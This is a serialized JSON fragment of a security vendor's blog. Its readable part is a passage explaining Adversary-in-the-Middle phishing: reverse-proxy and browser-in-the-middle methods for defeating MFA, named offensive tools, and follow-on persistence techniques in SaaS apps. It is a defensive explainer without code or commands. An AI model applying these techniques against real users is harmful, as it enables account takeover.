"nodeType":173,"value":63256,"marks":229067,"data":229069},[229068],{"type":194},{},{"nodeType":173,"value":185255,"marks":229071,"data":229072},[],{},{"nodeType":186,"data":229074,"content":229075},{"uri":70029},[229076],{"nodeType":173,"value":185262,"marks":229077,"data":229079},[229078],{"type":194},{},{"nodeType":173,"value":60235,"marks":229081,"data":229082},[],{},{"nodeType":178,"data":229084,"content":229085},{},[229086,229089,229096],{"nodeType":173,"value":185273,"marks":229087,"data":229088},[],{},{"nodeType":186,"data":229090,"content":229091},{"uri":49844},[229092],{"nodeType":173,"value":185280,"marks":229093,"data":229095},[229094],{"type":194},{},{"nodeType":173,"value":481,"marks":229097,"data":229098},[],{},{"nodeType":169,"data":229100,"content":229101},{},[229102],{"nodeType":173,"value":185291,"marks":229103,"data":229104},[],{},{"nodeType":178,"data":229106,"content":229107},{},[229108,229111,229117],{"nodeType":173,"value":5039,"marks":229109,"data":229110},[],{},{"nodeType":186,"data":229112,"content":229113},{"uri":74621},[229114],{"nodeType":173,"value":185304,"marks":229115,"data":229116},[],{},{"nodeType":173,"value":185308,"marks":229118,"data":229119},[],{},{"nodeType":178,"data":229121,"content":229122},{},[229123],{"nodeType":173,"value":185315,"marks":229124,"data":229125},[],{},{"nodeType":178,"data":229127,"content":229128},{},[229129],{"nodeType":173,"value":185322,"marks":229130,"data":229131},[],{},{"nodeType":178,"data":229133,"content":229134},{},[229135,229138,229144],{"nodeType":173,"value":185329,"marks":229136,"data":229137},[],{},{"nodeType":186,"data":229139,"content":229140},{"uri":184425},[229141],{"nodeType":173,"value":185336,"marks":229142,"data":229143},[],{},{"nodeType":173,"value":37,"marks":229145,"data":229146},[],{},{"nodeType":178,"data":229148,"content":229149},{},[229150],{"nodeType":173,"value":185346,"marks":229151,"data":229152},[],{},{"nodeType":169,"data":229154,"content":229155},{},[229156],{"nodeType":173,"value":185353,"marks":229157,"data":229158},[],{},{"nodeType":178,"data":229160,"content":229161},{},[229162],{"nodeType":173,"value":185360,"marks":229163,"data":229164},[],{},{"nodeType":250,"data":229166,"content":229167},{},[229168,229177,229186],{"nodeType":254,"data":229169,"content":229170},{},[229171],{"nodeType":178,"data":229172,"content":229173},{},[229174],{"nodeType":173,"value":185373,"marks":229175,"data":229176},[],{},{"nodeType":254,"data":229178,"content":229179},{},[229180],{"nodeType":178,"data":229181,"content":229182},{},[229183],{"nodeType":173,"value":185383,"marks":229184,"data":229185},[],{},{"nodeType":254,"data":229187,"content":229188},{},[229189],{"nodeType":178,"data":229190,"content":229191},{},[229192],{"nodeType":173,"value":185393,"marks":229193,"data":229194},[],{},{"nodeType":178,"data":229196,"content":229197},{},[229198],{"nodeType":173,"value":185400,"marks":229199,"data":229200},[],{},{"nodeType":178,"data":229202,"content":229203},{},[229204,229207,229214],{"nodeType":173,"value":185407,"marks":229205,"data":229206},[],{},{"nodeType":186,"data":229208,"content":229209},{"uri":97117},[229210],{"nodeType":173,"value":185414,"marks":229211,"data":229213},[229212],{"type":194},{},{"nodeType":173,"value":37,"marks":229215,"data":229216},[],{},{"nodeType":178,"data":229218,"content":229219},{},[229220,229223,229229],{"nodeType":173,"value":185425,"marks":229221,"data":229222},[],{},{"nodeType":186,"data":229224,"content":229225},{"uri":106719},[229226],{"nodeType":173,"value":185432,"marks":229227,"data":229228},[],{},{"nodeType":173,"value":2340,"marks":229230,"data":229231},[],{},{"nodeType":312,"data":229233,"content":229236},{"target":229234},{"sys":229235},{"id":185442,"type":317,"linkType":318},[],{"nodeType":178,"data":229238,"content":229239},{},[229240],{"nodeType":173,"value":37,"marks":229241,"data":229242},[],{},{"entries":229244},{"hyperlink":229245,"inline":229246,"block":229247},[],[],[229248,229255],{"sys":229249,"__typename":5345,"title":229250,"caption":229251,"layoutMode":118,"file":229252},{"id":184778},"Table: Possible login methods (app-depending)","Possible login methods (app-depending)",{"url":229253,"width":229254,"height":182531},"https://images.ctfassets.net/y1cdw1ablpvd/3Yp7zlOF1rje7MdlCGi9Jg/4e42024b09d9aa114b2740514b3e19bd/Screenshot_2024-10-30_at_13.23.48.png",3158,{"sys":229256,"__typename":15269,"type":112637,"ctaText":229257,"buttonLabel":93499,"buttonColour":15273,"buttonUrl":118},{"id":185442},"Book a demo to see how Push helps you to find and fix identity vulnerabilities like ghost logins","content:blog:ghost-logins-when-forgotten-identities-come-back-to-haunt-you.json","blog/ghost-logins-when-forgotten-identities-come-back-to-haunt-you.json","blog/ghost-logins-when-forgotten-identities-come-back-to-haunt-you",{"_path":229262,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":229263,"ogImage":118,"summary":229265,"title":184068,"subtitle":118,"metaTitle":229276,"synopsis":184069,"hashTags":118,"publishedDate":184070,"slug":184071,"tagsCollection":229277,"relatedBlogPostsCollection":229283,"authorsCollection":230983,"content":230987,"_id":231720,"_type":5439,"_source":5440,"_file":231721,"_stem":231722,"_extension":5439},"/blog/introducing-set-and-forget-controls-that-stop-real-world-identity-attacks",{"id":183305,"publishedAt":229264},"2026-01-30T09:19:46.911Z",{"json":229266},{"data":229267,"content":229268,"nodeType":165},{},[229269],{"data":229270,"content":229271,"nodeType":178},{},[229272],{"data":229273,"marks":229274,"value":229275,"nodeType":173},{},[],"Enable plug-and-play detections and interventions in the browser using Push’s new security controls, or create your own automations from unique browser telemetry provided via API and webhooks.","Stop identity attacks with Push's security controls",{"items":229278},[229279,229281],{"sys":229280,"name":18399},{"id":18398},{"sys":229282,"name":509},{"id":508},{"items":229284},[229285,229732,230561],{"__typename":1528,"sys":229286,"content":229287,"title":212529,"synopsis":212530,"hashTags":118,"publishedDate":114485,"slug":212531,"tagsCollection":229722,"authorsCollection":229728},{"id":114220},{"json":229288},{"nodeType":165,"data":229289,"content":229290},{},[229291,229296,229302,229332,229338,229354,229360,229396,229402,229408,229414,229419,229425,229503,229509,229515,229536,229542,229548,229554,229560,229566,229572,229616,229622,229627,229643,229648,229654,229670,229676,229682,229688,229694,229700,229706],{"nodeType":312,"data":229292,"content":229295},{"target":229293},{"sys":229294},{"id":212043,"type":317,"linkType":318},[],{"nodeType":178,"data":229297,"content":229298},{},[229299],{"nodeType":173,"value":212049,"marks":229300,"data":229301},[],{},{"nodeType":250,"data":229303,"content":229304},{},[229305,229314,229323],{"nodeType":254,"data":229306,"content":229307},{},[229308],{"nodeType":178,"data":229309,"content":229310},{},[229311],{"nodeType":173,"value":212062,"marks":229312,"data":229313},[],{},{"nodeType":254,"data":229315,"content":229316},{},[229317],{"nodeType":178,"data":229318,"content":229319},{},[229320],{"nodeType":173,"value":212072,"marks":229321,"data":229322},[],{},{"nodeType":254,"data":229324,"content":229325},{},[229326],{"nodeType":178,"data":229327,"content":229328},{},[229329],{"nodeType":173,"value":212082,"marks":229330,"data":229331},[],{},{"nodeType":178,"data":229333,"content":229334},{},[229335],{"nodeType":173,"value":212089,"marks":229336,"data":229337},[],{},{"nodeType":178,"data":229339,"content":229340},{},[229341,229344,229351],{"nodeType":173,"value":212096,"marks":229342,"data":229343},[],{},{"nodeType":186,"data":229345,"content":229346},{"uri":212101},[229347],{"nodeType":173,"value":126168,"marks":229348,"data":229350},[229349],{"type":194},{},{"nodeType":173,"value":212108,"marks":229352,"data":229353},[],{},{"nodeType":169,"data":229355,"content":229356},{},[229357],{"nodeType":173,"value":212115,"marks":229358,"data":229359},[],{},{"nodeType":178,"data":229361,"content":229362},{},[229363,229366,229373,229376,229383,229386,229393],{"nodeType":173,"value":212122,"marks":229364,"data":229365},[],{},{"nodeType":186,"data":229367,"content":229368},{"uri":212127},[229369],{"nodeType":173,"value":212130,"marks":229370,"data":229372},[229371],{"type":194},{},{"nodeType":173,"value":212135,"marks":229374,"data":229375},[],{},{"nodeType":186,"data":229377,"content":229378},{"uri":212140},[229379],{"nodeType":173,"value":212143,"marks":229380,"data":229382},[229381],{"type":194},{},{"nodeType":173,"value":212148,"marks":229384,"data":229385},[],{},{"nodeType":186,"data":229387,"content":229388},{"uri":182804},[229389],{"nodeType":173,"value":212155,"marks":229390,"data":229392},[229391],{"type":194},{},{"nodeType":173,"value":212160,"marks":229394,"data":229395},[],{},{"nodeType":178,"data":229397,"content":229398},{},[229399],{"nodeType":173,"value":212167,"marks":229400,"data":229401},[],{},{"nodeType":178,"data":229403,"content":229404},{},[229405],{"nodeType":173,"value":212174,"marks":229406,"data":229407},[],{},{"nodeType":178,"data":229409,"content":229410},{},[229411],{"nodeType":173,"value":212181,"marks":229412,"data":229413},[],{},{"nodeType":312,"data":229415,"content":229418},{"target":229416},{"sys":229417},{"id":196342,"type":317,"linkType":318},[],{"nodeType":178,"data":229420,"content":229421},{},[229422],{"nodeType":173,"value":212193,"marks":229423,"data":229424},[],{},{"nodeType":250,"data":229426,"content":229427},{},[229428,229447,229466,229485],{"nodeType":254,"data":229429,"content":229430},{},[229431],{"nodeType":178,"data":229432,"content":229433},{},[229434,229437,229444],{"nodeType":173,"value":212206,"marks":229435,"data":229436},[],{},{"nodeType":186,"data":229438,"content":229439},{"uri":150408},[229440],{"nodeType":173,"value":212213,"marks":229441,"data":229443},[229442],{"type":194},{},{"nodeType":173,"value":37,"marks":229445,"data":229446},[],{},{"nodeType":254,"data":229448,"content":229449},{},[229450],{"nodeType":178,"data":229451,"content":229452},{},[229453,229456,229463],{"nodeType":173,"value":212227,"marks":229454,"data":229455},[],{},{"nodeType":186,"data":229457,"content":229458},{"uri":212232},[229459],{"nodeType":173,"value":212235,"marks":229460,"data":229462},[229461],{"type":194},{},{"nodeType":173,"value":37,"marks":229464,"data":229465},[],{},{"nodeType":254,"data":229467,"content":229468},{},[229469],{"nodeType":178,"data":229470,"content":229471},{},[229472,229475,229482],{"nodeType":173,"value":212249,"marks":229473,"data":229474},[],{},{"nodeType":186,"data":229476,"content":229477},{"uri":1297},[229478],{"nodeType":173,"value":212256,"marks":229479,"data":229481},[229480],{"type":194},{},{"nodeType":173,"value":37,"marks":229483,"data":229484},[],{},{"nodeType":254,"data":229486,"content":229487},{},[229488],{"nodeType":178,"data":229489,"content":229490},{},[229491,229494,229500],{"nodeType":173,"value":212270,"marks":229492,"data":229493},[],{},{"nodeType":186,"data":229495,"content":229496},{"uri":174431},[229497],{"nodeType":173,"value":212277,"marks":229498,"data":229499},[],{},{"nodeType":173,"value":37,"marks":229501,"data":229502},[],{},{"nodeType":169,"data":229504,"content":229505},{},[229506],{"nodeType":173,"value":212287,"marks":229507,"data":229508},[],{},{"nodeType":178,"data":229510,"content":229511},{},[229512],{"nodeType":173,"value":212294,"marks":229513,"data":229514},[],{},{"nodeType":250,"data":229516,"content":229517},{},[229518,229527],{"nodeType":254,"data":229519,"content":229520},{},[229521],{"nodeType":178,"data":229522,"content":229523},{},[229524],{"nodeType":173,"value":212307,"marks":229525,"data":229526},[],{},{"nodeType":254,"data":229528,"content":229529},{},[229530],{"nodeType":178,"data":229531,"content":229532},{},[229533],{"nodeType":173,"value":212317,"marks":229534,"data":229535},[],{},{"nodeType":178,"data":229537,"content":229538},{},[229539],{"nodeType":173,"value":212324,"marks":229540,"data":229541},[],{},{"nodeType":178,"data":229543,"content":229544},{},[229545],{"nodeType":173,"value":212331,"marks":229546,"data":229547},[],{},{"nodeType":169,"data":229549,"content":229550},{},[229551],{"nodeType":173,"value":212338,"marks":229552,"data":229553},[],{},{"nodeType":178,"data":229555,"content":229556},{},[229557],{"nodeType":173,"value":212345,"marks":229558,"data":229559},[],{},{"nodeType":178,"data":229561,"content":229562},{},[229563],{"nodeType":173,"value":212352,"marks":229564,"data":229565},[],{},{"nodeType":178,"data":229567,"content":229568},{},[229569],{"nodeType":173,"value":100610,"marks":229570,"data":229571},[],{},{"nodeType":250,"data":229573,"content":229574},{},[229575,229584,229593],{"nodeType":254,"data":229576,"content":229577},{},[229578],{"nodeType":178,"data":229579,"content":229580},{},[229581],{"nodeType":173,"value":212371,"marks":229582,"data":229583},[],{},{"nodeType":254,"data":229585,"content":229586},{},[229587],{"nodeType":178,"data":229588,"content":229589},{},[229590],{"nodeType":173,"value":212381,"marks":229591,"data":229592},[],{},{"nodeType":254,"data":229594,"content":229595},{},[229596],{"nodeType":178,"data":229597,"content":229598},{},[229599,229602,229606,229609,229613],{"nodeType":173,"value":212391,"marks":229600,"data":229601},[],{},{"nodeType":173,"value":208,"marks":229603,"data":229605},[229604],{"type":1646},{},{"nodeType":173,"value":212399,"marks":229607,"data":229608},[],{},{"nodeType":173,"value":114302,"marks":229610,"data":229612},[229611],{"type":1646},{},{"nodeType":173,"value":212407,"marks":229614,"data":229615},[],{},{"nodeType":178,"data":229617,"content":229618},{},[229619],{"nodeType":173,"value":212414,"marks":229620,"data":229621},[],{},{"nodeType":312,"data":229623,"content":229626},{"target":229624},{"sys":229625},{"id":114271,"type":317,"linkType":318},[],{"nodeType":178,"data":229628,"content":229629},{},[229630,229633,229640],{"nodeType":173,"value":212426,"marks":229631,"data":229632},[],{},{"nodeType":186,"data":229634,"content":229635},{"uri":212101},[229636],{"nodeType":173,"value":3262,"marks":229637,"data":229639},[229638],{"type":194},{},{"nodeType":173,"value":1477,"marks":229641,"data":229642},[],{},{"nodeType":312,"data":229644,"content":229647},{"target":229645},{"sys":229646},{"id":212443,"type":317,"linkType":318},[],{"nodeType":169,"data":229649,"content":229650},{},[229651],{"nodeType":173,"value":212449,"marks":229652,"data":229653},[],{},{"nodeType":178,"data":229655,"content":229656},{},[229657,229660,229667],{"nodeType":173,"value":212456,"marks":229658,"data":229659},[],{},{"nodeType":186,"data":229661,"content":229662},{"uri":212461},[229663],{"nodeType":173,"value":212464,"marks":229664,"data":229666},[229665],{"type":194},{},{"nodeType":173,"value":212469,"marks":229668,"data":229669},[],{},{"nodeType":178,"data":229671,"content":229672},{},[229673],{"nodeType":173,"value":212476,"marks":229674,"data":229675},[],{},{"nodeType":178,"data":229677,"content":229678},{},[229679],{"nodeType":173,"value":212483,"marks":229680,"data":229681},[],{},{"nodeType":178,"data":229683,"content":229684},{},[229685],{"nodeType":173,"value":212490,"marks":229686,"data":229687},[],{},{"nodeType":178,"data":229689,"content":229690},{},[229691],{"nodeType":173,"value":212497,"marks":229692,"data":229693},[],{},{"nodeType":178,"data":229695,"content":229696},{},[229697],{"nodeType":173,"value":212504,"marks":229698,"data":229699},[],{},{"nodeType":169,"data":229701,"content":229702},{},[229703],{"nodeType":173,"value":71801,"marks":229704,"data":229705},[],{},{"nodeType":178,"data":229707,"content":229708},{},[229709,229712,229719],{"nodeType":173,"value":114452,"marks":229710,"data":229711},[],{},{"nodeType":186,"data":229713,"content":229714},{"uri":473},[229715],{"nodeType":173,"value":88194,"marks":229716,"data":229718},[229717],{"type":194},{},{"nodeType":173,"value":202527,"marks":229720,"data":229721},[],{},{"items":229723},[229724,229726],{"sys":229725,"name":509},{"id":508},{"sys":229727,"name":18399},{"id":18398},{"items":229729},[229730],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":229731},{"url":2911},{"__typename":1528,"sys":229733,"content":229734,"title":140020,"synopsis":230548,"hashTags":118,"publishedDate":230549,"slug":230550,"tagsCollection":230551,"authorsCollection":230557},{"id":202149},{"json":229735},{"nodeType":165,"data":229736,"content":229737},{},[229738,229745,229752,229759,229766,229773,229780,229787,229794,229801,229807,229814,229821,229828,229877,229884,229891,229910,229917,229924,229931,229963,229979,229986,229993,230000,230007,230014,230021,230041,230059,230163,230170,230188,230195,230202,230209,230215,230222,230229,230236,230267,230273,230280,230313,230320,230327,230423,230440,230446,230453,230460,230467,230520,230527,230530,230537,230542],{"nodeType":178,"data":229739,"content":229740},{},[229741],{"nodeType":173,"value":229742,"marks":229743,"data":229744},"Phishing attacks have always been a go-to technique for both red teamers and real-world threat actors alike. Whether focused on harvesting creds or running malicious payloads, phishing has continued to be adapted to circumvent defenses and has remained highly effective due to this.",[],{},{"nodeType":178,"data":229746,"content":229747},{},[229748],{"nodeType":173,"value":229749,"marks":229750,"data":229751},"As MFA has become more common, classic password harvesting focused phishing attacks have become less effective. Typically, for a full account compromise, an MFA push notification or a one-time passcode (OTP) needs to be entered at the time of login. This means harvesting passwords and using them later is no longer effective alone, because an MFA factor is still required each time a valid login is performed.",[],{},{"nodeType":178,"data":229753,"content":229754},{},[229755],{"nodeType":173,"value":229756,"marks":229757,"data":229758},"Adversary-in-the-Middle (AitM) phishing is a newer variant of phishing that allows attackers to circumvent MFA protection. In this article, we’re going to look at what AitM phishing is, how it works, and what you can do about it.",[],{},{"nodeType":169,"data":229760,"content":229761},{},[229762],{"nodeType":173,"value":229763,"marks":229764,"data":229765},"What is AitM phishing?",[],{},{"nodeType":178,"data":229767,"content":229768},{},[229769],{"nodeType":173,"value":229770,"marks":229771,"data":229772},"AitM phishing is a technique that uses dedicated tooling to act as a proxy between the target and a legitimate login portal for an application, principally to make it easier to defeat MFA protection. ",[],{},{"nodeType":178,"data":229774,"content":229775},{},[229776],{"nodeType":173,"value":229777,"marks":229778,"data":229779},"While any login portal can be a target, attackers typically look for SSO login portals such as Microsoft Entra, Okta, or Google Workspace. This allows the target to log in successfully with a legitimate service they use and even continue to interact with it, while providing additional access to connected SSO apps if the attack is successful. ",[],{},{"nodeType":178,"data":229781,"content":229782},{},[229783],{"nodeType":173,"value":229784,"marks":229785,"data":229786},"As it’s a proxy to the real application, the page will appear exactly as the user expects, because they are logging into the legitimate site – just taking a detour via the attacker’s device. For example, if accessing their webmail, the user will see all their real emails; if accessing their cloud file store then all their real files will be present, etc. This gives the method an increased sense of authenticity and makes the compromise less obvious to the user. However, because the attacker is sitting in the middle of this connection, they are able to observe all interactions and also take control of the authenticated session to gain control of the user account. ",[],{},{"nodeType":178,"data":229788,"content":229789},{},[229790],{"nodeType":173,"value":229791,"marks":229792,"data":229793},"While this access is technically temporary, since the attacker is unable to re-authenticate in future without additional MFA prompts, in practice authenticated sessions can often last as long as 30 days or more if kept active. Additionally, there are a wide range of persistence techniques that allow an attacker to maintain some level of access to the user account and/or targeted application indefinitely. ",[],{},{"nodeType":178,"data":229795,"content":229796},{},[229797],{"nodeType":173,"value":229798,"marks":229799,"data":229800},"We’ll revisit this point later, but for now let’s consider the two main techniques that are used to implement AitM phishing: Reverse web proxies and Browser-in-the-Middle techniques.",[],{},{"nodeType":312,"data":229802,"content":229806},{"target":229803},{"sys":229804},{"id":229805,"type":317,"linkType":318},"6WEolDcviadCgAW4dCgTPW",[],{"nodeType":235,"data":229808,"content":229809},{},[229810],{"nodeType":173,"value":229811,"marks":229812,"data":229813},"Reverse web proxy techniques",[],{},{"nodeType":178,"data":229815,"content":229816},{},[229817],{"nodeType":173,"value":229818,"marks":229819,"data":229820},"One common AitM phishing approach is to use tooling that acts as a reverse web proxy. For example, let’s say a victim is tricked into visiting a malicious domain. Under the hood, HTTP requests are passed between the victim’s browser and the real site via the malicious site. When the malicious site receives an HTTP request, it forwards this request on to the legitimate site it is impersonating, receives the response, and then forwards that on to the victim. ",[],{},{"nodeType":178,"data":229822,"content":229823},{},[229824],{"nodeType":173,"value":229825,"marks":229826,"data":229827},"In practice, there are many technical challenges, such as rewriting all links and references to the impersonated site to ensure everything continues to be sent to the attacker. However, at a high level, it really is just acting as a reverse web proxy.",[],{},{"nodeType":178,"data":229829,"content":229830},{},[229831,229835,229842,229845,229852,229856,229863,229867,229874],{"nodeType":173,"value":229832,"marks":229833,"data":229834},"This is arguably the most scalable and reliable approach from an attacker’s point of view. Open-source tools that demonstrate this method include ",[],{},{"nodeType":186,"data":229836,"content":229837},{"uri":196192},[229838],{"nodeType":173,"value":196195,"marks":229839,"data":229841},[229840],{"type":194},{},{"nodeType":173,"value":2936,"marks":229843,"data":229844},[],{},{"nodeType":186,"data":229846,"content":229847},{"uri":196203},[229848],{"nodeType":173,"value":196206,"marks":229849,"data":229851},[229850],{"type":194},{},{"nodeType":173,"value":229853,"marks":229854,"data":229855},", and the ever popular ",[],{},{"nodeType":186,"data":229857,"content":229858},{"uri":181618},[229859],{"nodeType":173,"value":181621,"marks":229860,"data":229862},[229861],{"type":194},{},{"nodeType":173,"value":229864,"marks":229865,"data":229866},". In the criminal world, there are also similar private toolsets available that have been used in many breaches in the past. A good example of this would be ",[],{},{"nodeType":186,"data":229868,"content":229869},{"uri":196223},[229870],{"nodeType":173,"value":196226,"marks":229871,"data":229873},[229872],{"type":194},{},{"nodeType":173,"value":1477,"marks":229875,"data":229876},[],{},{"nodeType":178,"data":229878,"content":229879},{},[229880],{"nodeType":173,"value":229881,"marks":229882,"data":229883},"One downside to this approach is that there are controls that can be put in place to block it. For example, application developers can hide obfuscated JavaScript code that will fail if the correct value is not produced, checking that the origin matches the expected (legitimate) domains or contains encrypted tokens including this material sent as part of the login process. ",[],{},{"nodeType":178,"data":229885,"content":229886},{},[229887],{"nodeType":173,"value":229888,"marks":229889,"data":229890},"While your average small website is not going to be implementing such checks, major identity providers have a strong vested interest in evolving their defenses to block these techniques. At this point, it’s a cat-and-mouse game. ",[],{},{"nodeType":178,"data":229892,"content":229893},{},[229894,229898,229907],{"nodeType":173,"value":229895,"marks":229896,"data":229897},"If you want to know more about this space, then definitely check out ",[],{},{"nodeType":186,"data":229899,"content":229901},{"uri":229900},"https://www.youtube.com/watch?v=C-Fh4sIdY8c",[229902],{"nodeType":173,"value":229903,"marks":229904,"data":229906},"Kuba Gretzky’s talk on this at x33fcon",[229905],{"type":194},{},{"nodeType":173,"value":481,"marks":229908,"data":229909},[],{},{"nodeType":235,"data":229911,"content":229912},{},[229913],{"nodeType":173,"value":229914,"marks":229915,"data":229916},"Browser-in-the-Middle (BitM) techniques ",[],{},{"nodeType":178,"data":229918,"content":229919},{},[229920],{"nodeType":173,"value":229921,"marks":229922,"data":229923},"Another common approach is known as Browser-in-the-Middle (BitM). Rather than act as a reverse web proxy, this technique tricks a target into directly controlling the attacker’s own browser remotely using desktop screen sharing and control approaches, much like VNC and RDP. This enables the attacker to harvest not just the username and password, but all other associated secrets and tokens that go along with the login. ",[],{},{"nodeType":178,"data":229925,"content":229926},{},[229927],{"nodeType":173,"value":229928,"marks":229929,"data":229930},"In this case, the victim isn’t interacting with a fake website clone or proxy. They are literally remotely controlling the attacker’s browser to log in to the legitimate application without realizing. This is the virtual equivalent of an attacker handing their laptop to their victim, asking them to login to Okta for them, and then taking their laptop back afterwards. Thanks very much!",[],{},{"nodeType":178,"data":229932,"content":229933},{},[229934,229938,229946,229950,229959],{"nodeType":173,"value":229935,"marks":229936,"data":229937},"Practically speaking, the most common approach for implementing this technique is using the open-source project noVNC, which is a JavaScript-based VNC client that allows VNC to be used in the browser. Probably the most well-known example of an offensive tool implementing this is ",[],{},{"nodeType":186,"data":229939,"content":229940},{"uri":180509},[229941],{"nodeType":173,"value":229942,"marks":229943,"data":229945},"EvilnoVNC",[229944],{"type":194},{},{"nodeType":173,"value":229947,"marks":229948,"data":229949},", which spins up Docker instances of VNC and proxies access to them, while also logging keystrokes and cookies to facilitate account compromise. Tools like ",[],{},{"nodeType":186,"data":229951,"content":229953},{"uri":229952},"https://posts.specterops.io/phishing-with-dynamite-7d33d8fac038",[229954],{"nodeType":173,"value":229955,"marks":229956,"data":229958},"Cuddlephish",[229957],{"type":194},{},{"nodeType":173,"value":229960,"marks":229961,"data":229962}," offer similar functionality using WebRTC. ",[],{},{"nodeType":178,"data":229964,"content":229965},{},[229966,229970,229975],{"nodeType":173,"value":229967,"marks":229968,"data":229969},"The advantage of this approach is that ",[],{},{"nodeType":173,"value":229971,"marks":229972,"data":229974},"it is incredibly difficult for the target websites to do anything to stop it",[229973],{"type":370},{},{"nodeType":173,"value":229976,"marks":229977,"data":229978},". From their perspective, all they see is a legitimate browser accessing their website and logging in. None of the JavaScript tricks for checking the origin will work. They aren’t in a position to be able to see that the browser is secretly being controlled remotely by the victim user without their knowledge. ",[],{},{"nodeType":178,"data":229980,"content":229981},{},[229982],{"nodeType":173,"value":229983,"marks":229984,"data":229985},"On the downside, while noVNC can be extremely convincing, the illusion can sometimes be broken due to it not behaving exactly like a real website would due it being a graphical rendering. For example, something as simple as resizing the browser window can introduce render resolution issues. It’s also more difficult to scale for attacking large numbers of users than a reverse proxy technique.",[],{},{"nodeType":178,"data":229987,"content":229988},{},[229989],{"nodeType":173,"value":229990,"marks":229991,"data":229992},"Footnote: BitM is not to be confused with Browser-in-the-Browser (BitB), which is more of a malicious pop-up (think when a login button spawns a new browser window). ",[],{},{"nodeType":169,"data":229994,"content":229995},{},[229996],{"nodeType":173,"value":229997,"marks":229998,"data":229999},"Beyond initial access",[],{},{"nodeType":178,"data":230001,"content":230002},{},[230003],{"nodeType":173,"value":230004,"marks":230005,"data":230006},"So maybe you’re thinking now “OK, sounds kinda bad, but I’m not that worried. Maybe some user accounts get compromised by this method despite all my MFA protections, but at least the attacker only has temporary access, right?” ",[],{},{"nodeType":178,"data":230008,"content":230009},{},[230010],{"nodeType":173,"value":230011,"marks":230012,"data":230013},"In theory, access is temporary as sessions time out. And if spotted, the security team can respond by killing the authenticated sessions and forcing password changes for the compromised users. Then the attacker is back to square one, right? Their session is lost, they still don’t have MFA, and even the password they keylogged has now been changed.",[],{},{"nodeType":178,"data":230015,"content":230016},{},[230017],{"nodeType":173,"value":230018,"marks":230019,"data":230020},"In practice, it’s not this simple. We mentioned earlier how SSO portals are often the most common targets for these attacks. For most modern organizations, this means their core identity provider, which just so happens to be the gateway to accessing many other web applications, whether internal applications or a multitude of SaaS applications. ",[],{},{"nodeType":178,"data":230022,"content":230023},{},[230024,230028,230037],{"nodeType":173,"value":230025,"marks":230026,"data":230027},"Let’s consider the example of an organization using Okta where their Okta login portal has been used as the target for AitM phishing. A smart attacker is going to immediately leverage this access to establish authenticated sessions on every single application that Okta provides the user access to. They are also going to ",[],{},{"nodeType":186,"data":230029,"content":230031},{"uri":230030},"https://pushsecurity.com/blog/okta-swa/",[230032],{"nodeType":173,"value":230033,"marks":230034,"data":230036},"abuse Okta SWA",[230035],{"type":194},{},{"nodeType":173,"value":230038,"marks":230039,"data":230040}," to steal valid credentials for whichever applications support this method. And if that’s not enough, there are a variety of simple methods to achieve persistence on most downstream SaaS applications and sometimes even identity providers themselves.",[],{},{"nodeType":178,"data":230042,"content":230043},{},[230044,230048,230055],{"nodeType":173,"value":230045,"marks":230046,"data":230047},"While the full details of these persistence attacks are outside the scope of this article, more details on some key attacks can be found in a resource we created called the ",[],{},{"nodeType":186,"data":230049,"content":230050},{"uri":88239},[230051],{"nodeType":173,"value":88245,"marks":230052,"data":230054},[230053],{"type":194},{},{"nodeType":173,"value":230056,"marks":230057,"data":230058},". Some of the most common techniques that apply here are: ",[],{},{"nodeType":250,"data":230060,"content":230061},{},[230062,230082,230103,230123,230143],{"nodeType":254,"data":230063,"content":230064},{},[230065],{"nodeType":178,"data":230066,"content":230067},{},[230068,230071,230079],{"nodeType":173,"value":37,"marks":230069,"data":230070},[],{},{"nodeType":186,"data":230072,"content":230073},{"uri":59347},[230074],{"nodeType":173,"value":230075,"marks":230076,"data":230078},"SAT1004 - API keys",[230077],{"type":194},{},{"nodeType":173,"value":37,"marks":230080,"data":230081},[],{},{"nodeType":254,"data":230083,"content":230084},{},[230085],{"nodeType":178,"data":230086,"content":230087},{},[230088,230091,230100],{"nodeType":173,"value":37,"marks":230089,"data":230090},[],{},{"nodeType":186,"data":230092,"content":230094},{"uri":230093},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/link_sharing/description.md",[230095],{"nodeType":173,"value":230096,"marks":230097,"data":230099},"SAT1022 - Link sharing",[230098],{"type":194},{},{"nodeType":173,"value":37,"marks":230101,"data":230102},[],{},{"nodeType":254,"data":230104,"content":230105},{},[230106],{"nodeType":178,"data":230107,"content":230108},{},[230109,230112,230120],{"nodeType":173,"value":37,"marks":230110,"data":230111},[],{},{"nodeType":186,"data":230113,"content":230114},{"uri":832},[230115],{"nodeType":173,"value":230116,"marks":230117,"data":230119},"SAT1017 - Ghost logins",[230118],{"type":194},{},{"nodeType":173,"value":37,"marks":230121,"data":230122},[],{},{"nodeType":254,"data":230124,"content":230125},{},[230126],{"nodeType":178,"data":230127,"content":230128},{},[230129,230132,230140],{"nodeType":173,"value":37,"marks":230130,"data":230131},[],{},{"nodeType":186,"data":230133,"content":230134},{"uri":197688},[230135],{"nodeType":173,"value":230136,"marks":230137,"data":230139},"SAT1027 - OAuth tokens",[230138],{"type":194},{},{"nodeType":173,"value":37,"marks":230141,"data":230142},[],{},{"nodeType":254,"data":230144,"content":230145},{},[230146],{"nodeType":178,"data":230147,"content":230148},{},[230149,230152,230160],{"nodeType":173,"value":37,"marks":230150,"data":230151},[],{},{"nodeType":186,"data":230153,"content":230154},{"uri":144083},[230155],{"nodeType":173,"value":230156,"marks":230157,"data":230159},"SAT1033 - Shadow workflows",[230158],{"type":194},{},{"nodeType":173,"value":37,"marks":230161,"data":230162},[],{},{"nodeType":178,"data":230164,"content":230165},{},[230166],{"nodeType":173,"value":230167,"marks":230168,"data":230169},"Suddenly, containing the breach just got a LOT more complicated.",[],{},{"nodeType":178,"data":230171,"content":230172},{},[230173,230177,230184],{"nodeType":173,"value":230174,"marks":230175,"data":230176},"It’s not just application-level lateral movement and persistence to worry about, though. It’s possible the attacker can start moving laterally across other user accounts. If they have selected their targets well, they might even find they have admin access to some downstream SaaS application that has been configured for SAML logins using Okta. For example, maybe they compromise a finance employee who has admin access to their business expenses SaaS application. Then the attacker might be able to use a new technique like ",[],{},{"nodeType":186,"data":230178,"content":230179},{"uri":63250},[230180],{"nodeType":173,"value":63256,"marks":230181,"data":230183},[230182],{"type":194},{},{"nodeType":173,"value":230185,"marks":230186,"data":230187}," to start attacking other users in a watering hole attack to achieve lateral movement.",[],{},{"nodeType":169,"data":230189,"content":230190},{},[230191],{"nodeType":173,"value":230192,"marks":230193,"data":230194},"Video 